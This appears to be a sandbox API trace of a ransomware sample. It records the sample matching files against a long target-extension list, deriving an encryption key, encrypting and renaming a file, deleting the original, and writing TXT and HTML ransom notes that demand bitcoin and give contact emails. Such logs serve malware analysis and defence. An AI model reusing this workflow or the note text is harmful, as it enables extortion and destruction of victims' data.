	[0173.198] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml") returned 100
	[0173.198] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.199] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml") returned 0x64
	[0173.199] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.199] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0173.199] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"
	[0173.199] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml") returned 100
	[0173.199] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.200] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.200] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0173.200] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.200] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0173.200] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.200] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.200] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.201] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0173.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.205] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb770) returned 1
	[0173.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.207] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0173.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.208] CryptHashData (hHash=0xfb9130, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0173.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.208] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9130, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb95f0) returned 1
	[0173.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.208] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0173.208] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.209] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0173.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.209] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0173.209] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.209] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0173.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.210] CryptDestroyHash (hHash=0xfb9130) returned 1
	[0173.210] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.210] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0173.210] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.210] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.211] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.211] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0173.212] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0173.213] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0173.214] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0173.217] CloseHandle (hObject=0x39c) returned 1
	[0173.218] CloseHandle (hObject=0x390) returned 1
	[0173.218] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml")) returned 1
	[0173.221] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml")) returned 0
	[0173.221] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0173.222] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0173.222] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0173.222] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0173.222] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}"
	[0173.222] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*.*"
	[0173.223] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.223] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.223] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0173.223] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.224] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.224] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.227] CloseHandle (hObject=0x388) returned 1
	[0173.227] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.258] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0173.262] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.262] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.263] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.264] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.264] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0173.264] CloseHandle (hObject=0x388) returned 1
	[0173.265] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.265] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.265] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.266] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0173.266] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.266] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.266] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0173.269] CloseHandle (hObject=0x388) returned 1
	[0173.270] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.271] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.271] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0173.272] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.272] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0173.273] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.273] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.273] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0173.273] CloseHandle (hObject=0x388) returned 1
